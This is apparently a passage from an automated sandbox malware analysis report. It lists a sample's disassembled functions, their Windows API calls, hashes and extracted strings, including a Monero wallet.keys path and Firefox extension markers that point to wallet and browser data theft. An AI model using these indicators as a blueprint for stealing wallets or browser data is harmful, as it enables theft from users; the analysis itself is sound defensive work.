                      • ShellExecuteEx.SHELL32(0000003C), ref: 00EF6726
                      • ExitProcess.KERNEL32 ref: 00EF6755
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1627399781.0000000000EE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                      • Associated: 00000000.00000002.1627388243.0000000000EE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000F91000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000012C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.000000000139F000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627786841.00000000013D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627895362.0000000001571000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627911280.0000000001572000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_ee0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                      • String ID: <
                      • API String ID: 1148417306-4251816714
                      • Opcode ID: f4814336a13e94bf327fe39669855378d5586f27e33b1239664d5c4a366e381e
                      • Instruction ID: 45b4f272ef58ef1a0c345fd1359e5a4cb06fe0b21b23e0f13938b76c2b154cbe
                      • Opcode Fuzzy Hash: f4814336a13e94bf327fe39669855378d5586f27e33b1239664d5c4a366e381e
                      • Instruction Fuzzy Hash: 60310DB1801218AADB28EF50D995BEE77B8AF48300F4051A9F31977191DFB46B88CF55
                      Function 00EF87C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64memoryCOMMON
                      Download Yara Rule
                      APIs
                      • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00F00E28,00000000,?), ref: 00EF882F
                      • RtlAllocateHeap.NTDLL(00000000), ref: 00EF8836
                      • wsprintfA.USER32 ref: 00EF8850
                        • Part of subcall function 00EFA740: lstrcpy.KERNEL32(00F00E17,00000000), ref: 00EFA788
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1627399781.0000000000EE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                      • Associated: 00000000.00000002.1627388243.0000000000EE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000F91000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000012C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.000000000139F000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627786841.00000000013D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627895362.0000000001571000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627911280.0000000001572000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_ee0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Heap$AllocateProcesslstrcpywsprintf
                      • String ID: %dx%d
                      • API String ID: 1695172769-2206825331
                      • Opcode ID: bb72509bc67a1612d9179dd7d2d6a2a7b796ebb825c9adc302f29f2a91ea9115
                      • Instruction ID: eacdcb71770b1ed3c66956e8cf8e45feacd36d4f8acccba4837adb14f039c155
                      • Opcode Fuzzy Hash: bb72509bc67a1612d9179dd7d2d6a2a7b796ebb825c9adc302f29f2a91ea9115
                      • Instruction Fuzzy Hash: 732163B1A40208BFDB28DF94ED45FAEBBB8FF48701F104129F615A7684C77999108BA0
                      Function 00EF8D50 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20memoryCOMMON
                      Download Yara Rule
                      APIs
                      • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,00EF951E,00000000), ref: 00EF8D5B
                      • RtlAllocateHeap.NTDLL(00000000), ref: 00EF8D62
                      • wsprintfW.USER32 ref: 00EF8D78
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1627399781.0000000000EE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                      • Associated: 00000000.00000002.1627388243.0000000000EE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000F91000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000012C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.000000000139F000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627786841.00000000013D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627895362.0000000001571000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627911280.0000000001572000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_ee0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Heap$AllocateProcesswsprintf
                      • String ID: %hs
                      • API String ID: 769748085-2783943728
                      • Opcode ID: 7824e5485e66be67ec6930cb9a55840f4303c3a9062ecaf0fa7d80f7a97c4b32
                      • Instruction ID: 981f08115144fa530b20d0bfd931dcd18fde8af878b0d328f875e6be5c4528b4
                      • Opcode Fuzzy Hash: 7824e5485e66be67ec6930cb9a55840f4303c3a9062ecaf0fa7d80f7a97c4b32
                      • Instruction Fuzzy Hash: 2CE08670A40208BBD724DF94E809E5977B8EF04702F004064FD0987680D9719E509B55
                      Function 00EEA260 Relevance: 6.4, APIs: 4, Instructions: 370filestringCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00EFA740: lstrcpy.KERNEL32(00F00E17,00000000), ref: 00EFA788
                        • Part of subcall function 00EFA9B0: lstrlen.KERNEL32(?,016888F8,?,\Monero\wallet.keys,00F00E17), ref: 00EFA9C5
                        • Part of subcall function 00EFA9B0: lstrcpy.KERNEL32(00000000), ref: 00EFAA04
                        • Part of subcall function 00EFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00EFAA12
                        • Part of subcall function 00EFA8A0: lstrcpy.KERNEL32(?,00F00E17), ref: 00EFA905
                        • Part of subcall function 00EF8B60: GetSystemTime.KERNEL32(00F00E1A,0168C928,00F005AE,?,?,00EE13F9,?,0000001A,00F00E1A,00000000,?,016888F8,?,\Monero\wallet.keys,00F00E17), ref: 00EF8B86
                        • Part of subcall function 00EFA920: lstrcpy.KERNEL32(00000000,?), ref: 00EFA972
                        • Part of subcall function 00EFA920: lstrcat.KERNEL32(00000000), ref: 00EFA982
                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00EEA2E1
                      • lstrlen.KERNEL32(00000000,00000000), ref: 00EEA3FF
                      • lstrlen.KERNEL32(00000000), ref: 00EEA6BC
                        • Part of subcall function 00EFA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00EFA7E6
                      • DeleteFileA.KERNEL32(00000000), ref: 00EEA743
                      Memory Dump Source
                      • Source File: 00000000.00000002.1627399781.0000000000EE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                      • Associated: 00000000.00000002.1627388243.0000000000EE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000F91000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000012C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.000000000139F000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627786841.00000000013D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627895362.0000000001571000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627911280.0000000001572000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_ee0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                      • String ID:
                      • API String ID: 211194620-0
                      • Opcode ID: c7c4fd4d4f7e8e11915d5704e04eb96a5167666e50a9a1d432353a1d5526b888
                      • Instruction ID: ae286cf5cccaad6df37b2debaea4c4f2e70b747810b9ba99ec7584696b1ad4eb
                      • Opcode Fuzzy Hash: c7c4fd4d4f7e8e11915d5704e04eb96a5167666e50a9a1d432353a1d5526b888
                      • Instruction Fuzzy Hash: D4E133B281004CAACB18FBA4DC95EFE7378AF54340F549179F61A76091EF706A4DCB62
                      Function 00EED400 Relevance: 6.3, APIs: 4, Instructions: 252filestringCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00EFA740: lstrcpy.KERNEL32(00F00E17,00000000), ref: 00EFA788
                        • Part of subcall function 00EFA9B0: lstrlen.KERNEL32(?,016888F8,?,\Monero\wallet.keys,00F00E17), ref: 00EFA9C5
                        • Part of subcall function 00EFA9B0: lstrcpy.KERNEL32(00000000), ref: 00EFAA04
                        • Part of subcall function 00EFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00EFAA12
                        • Part of subcall function 00EFA8A0: lstrcpy.KERNEL32(?,00F00E17), ref: 00EFA905
                        • Part of subcall function 00EF8B60: GetSystemTime.KERNEL32(00F00E1A,0168C928,00F005AE,?,?,00EE13F9,?,0000001A,00F00E1A,00000000,?,016888F8,?,\Monero\wallet.keys,00F00E17), ref: 00EF8B86
                        • Part of subcall function 00EFA920: lstrcpy.KERNEL32(00000000,?), ref: 00EFA972
                        • Part of subcall function 00EFA920: lstrcat.KERNEL32(00000000), ref: 00EFA982
                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00EED481
                      • lstrlen.KERNEL32(00000000), ref: 00EED698
                      • lstrlen.KERNEL32(00000000), ref: 00EED6AC
                      • DeleteFileA.KERNEL32(00000000), ref: 00EED72B
                      Memory Dump Source
                      • Source File: 00000000.00000002.1627399781.0000000000EE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                      • Associated: 00000000.00000002.1627388243.0000000000EE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000F91000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000012C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.000000000139F000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627786841.00000000013D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627895362.0000000001571000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627911280.0000000001572000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_ee0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                      • String ID:
                      • API String ID: 211194620-0
                      • Opcode ID: b9d02ac35dfd9a34375c7c1f8fe1e8efdb376275d0ebdcfb02735c1615027aca
                      • Instruction ID: f4e29f30af5ccada1ac10a76bcf5cf2810755d3cfde2707cd5a83fef9d7872fd
                      • Opcode Fuzzy Hash: b9d02ac35dfd9a34375c7c1f8fe1e8efdb376275d0ebdcfb02735c1615027aca
                      • Instruction Fuzzy Hash: 939133B281010C9ACB18FBA0DC56DFE7378AF54300F549179F61BBA095EF746A49CB62
                      Function 00EED780 Relevance: 6.2, APIs: 4, Instructions: 221filestringCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00EFA740: lstrcpy.KERNEL32(00F00E17,00000000), ref: 00EFA788
                        • Part of subcall function 00EFA9B0: lstrlen.KERNEL32(?,016888F8,?,\Monero\wallet.keys,00F00E17), ref: 00EFA9C5
                        • Part of subcall function 00EFA9B0: lstrcpy.KERNEL32(00000000), ref: 00EFAA04
                        • Part of subcall function 00EFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00EFAA12
                        • Part of subcall function 00EFA8A0: lstrcpy.KERNEL32(?,00F00E17), ref: 00EFA905
                        • Part of subcall function 00EF8B60: GetSystemTime.KERNEL32(00F00E1A,0168C928,00F005AE,?,?,00EE13F9,?,0000001A,00F00E1A,00000000,?,016888F8,?,\Monero\wallet.keys,00F00E17), ref: 00EF8B86
                        • Part of subcall function 00EFA920: lstrcpy.KERNEL32(00000000,?), ref: 00EFA972
                        • Part of subcall function 00EFA920: lstrcat.KERNEL32(00000000), ref: 00EFA982
                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00EED801
                      • lstrlen.KERNEL32(00000000), ref: 00EED99F
                      • lstrlen.KERNEL32(00000000), ref: 00EED9B3
                      • DeleteFileA.KERNEL32(00000000), ref: 00EEDA32
                      Memory Dump Source
                      • Source File: 00000000.00000002.1627399781.0000000000EE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                      • Associated: 00000000.00000002.1627388243.0000000000EE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000F91000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000012C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.000000000139F000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627786841.00000000013D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627895362.0000000001571000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627911280.0000000001572000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_ee0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                      • String ID:
                      • API String ID: 211194620-0
                      • Opcode ID: f67d2c6f971d7e1448556fc2600d4abde38315d1e833c4b51892714773d06b66
                      • Instruction ID: 1a2fbec56097a053862e17ada41d38496057618014a208415a19ab9fd891fc1d
                      • Opcode Fuzzy Hash: f67d2c6f971d7e1448556fc2600d4abde38315d1e833c4b51892714773d06b66
                      • Instruction Fuzzy Hash: 788112B281014C9ACB18FBA0DC56DFE7378AF54300F549138F61BBA095EF746A59CB62
                      Function 00EEF4A0 Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 154stringCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00EFA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00EFA7E6
                        • Part of subcall function 00EE99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00EE99EC
                        • Part of subcall function 00EE99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00EE9A11
                        • Part of subcall function 00EE99C0: LocalAlloc.KERNEL32(00000040,?), ref: 00EE9A31
                        • Part of subcall function 00EE99C0: ReadFile.KERNEL32(000000FF,?,00000000,00EE148F,00000000), ref: 00EE9A5A
                        • Part of subcall function 00EE99C0: LocalFree.KERNEL32(00EE148F), ref: 00EE9A90
                        • Part of subcall function 00EE99C0: CloseHandle.KERNEL32(000000FF), ref: 00EE9A9A
                        • Part of subcall function 00EF8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00EF8E52
                        • Part of subcall function 00EFA740: lstrcpy.KERNEL32(00F00E17,00000000), ref: 00EFA788
                        • Part of subcall function 00EFA9B0: lstrlen.KERNEL32(?,016888F8,?,\Monero\wallet.keys,00F00E17), ref: 00EFA9C5
                        • Part of subcall function 00EFA9B0: lstrcpy.KERNEL32(00000000), ref: 00EFAA04
                        • Part of subcall function 00EFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00EFAA12
                        • Part of subcall function 00EFA8A0: lstrcpy.KERNEL32(?,00F00E17), ref: 00EFA905
                        • Part of subcall function 00EFA920: lstrcpy.KERNEL32(00000000,?), ref: 00EFA972
                        • Part of subcall function 00EFA920: lstrcat.KERNEL32(00000000), ref: 00EFA982
                      • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00F01580,00F00D92), ref: 00EEF54C
                      • lstrlen.KERNEL32(00000000), ref: 00EEF56B
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1627399781.0000000000EE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                      • Associated: 00000000.00000002.1627388243.0000000000EE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000F91000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000012C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.000000000139F000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627786841.00000000013D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627895362.0000000001571000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627911280.0000000001572000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_ee0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                      • String ID: ^userContextId=4294967295$moz-extension+++
                      • API String ID: 998311485-3310892237
                      • Opcode ID: 0864756a225ba414f99542b152162c819ac431b904287e4ac6ef5ec81d7bc4e8
                      • Instruction ID: 9099bc8f264ac7363eb6edd1a932a81f2786f13fbb79524b6bc282a1d84e20dd
                      • Opcode Fuzzy Hash: 0864756a225ba414f99542b152162c819ac431b904287e4ac6ef5ec81d7bc4e8
                      • Instruction Fuzzy Hash: 195124B290014CAADB08FFA0DC56DFD73B8AF94340F449538F51A7B195EE746609CBA2
                      Function 00EF70D0 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 140COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1627399781.0000000000EE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                      • Associated: 00000000.00000002.1627388243.0000000000EE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000F91000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000012C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.000000000139F000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627786841.00000000013D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627895362.0000000001571000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627911280.0000000001572000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_ee0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcpy
                      • String ID: s$s$65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
                      • API String ID: 3722407311-3520659465
                      • Opcode ID: 6c72df5518b12f15cb5f11bc6807b7b6e144e70e61149e4208e08c91c8193e71
                      • Instruction ID: 4b976dc3e397e768654b7be3b3a5b037be5142c8ea70e406dd62fa5d4cac6e1b
                      • Opcode Fuzzy Hash: 6c72df5518b12f15cb5f11bc6807b7b6e144e70e61149e4208e08c91c8193e71
                      • Instruction Fuzzy Hash: 4F516CB1D0421CABDB24EF90DC85BFEB3B4AF44304F14A1A8E25976181EB746E88DF55
                      Function 00EF3560 Relevance: 6.1, APIs: 4, Instructions: 124COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.1627399781.0000000000EE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                      • Associated: 00000000.00000002.1627388243.0000000000EE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000F91000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000012C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.000000000139F000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627786841.00000000013D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627895362.0000000001571000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627911280.0000000001572000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_ee0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcpy$lstrlen
                      • String ID:
                      • API String ID: 367037083-0
                      • Opcode ID: c7033e04e8e3577ce3c5a72aa66fb2e4cc319ffc0c9ca6ffe67099ffc557f782
                      • Instruction ID: eeabec7c8e9d47f201ddfdcf08b93aed8e7da730b72d9072502aab623f553afb
                      • Opcode Fuzzy Hash: c7033e04e8e3577ce3c5a72aa66fb2e4cc319ffc0c9ca6ffe67099ffc557f782
                      • Instruction Fuzzy Hash: 97412FB1D1010DABCB04EFB4D845AFEB7B4AF44305F149028F616BA290DB75AA45DBA2
                      Function 00EE9CE0 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 98COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00EFA740: lstrcpy.KERNEL32(00F00E17,00000000), ref: 00EFA788
                        • Part of subcall function 00EE99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00EE99EC
                        • Part of subcall function 00EE99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00EE9A11
                        • Part of subcall function 00EE99C0: LocalAlloc.KERNEL32(00000040,?), ref: 00EE9A31
                        • Part of subcall function 00EE99C0: ReadFile.KERNEL32(000000FF,?,00000000,00EE148F,00000000), ref: 00EE9A5A
                        • Part of subcall function 00EE99C0: LocalFree.KERNEL32(00EE148F), ref: 00EE9A90
                        • Part of subcall function 00EE99C0: CloseHandle.KERNEL32(000000FF), ref: 00EE9A9A
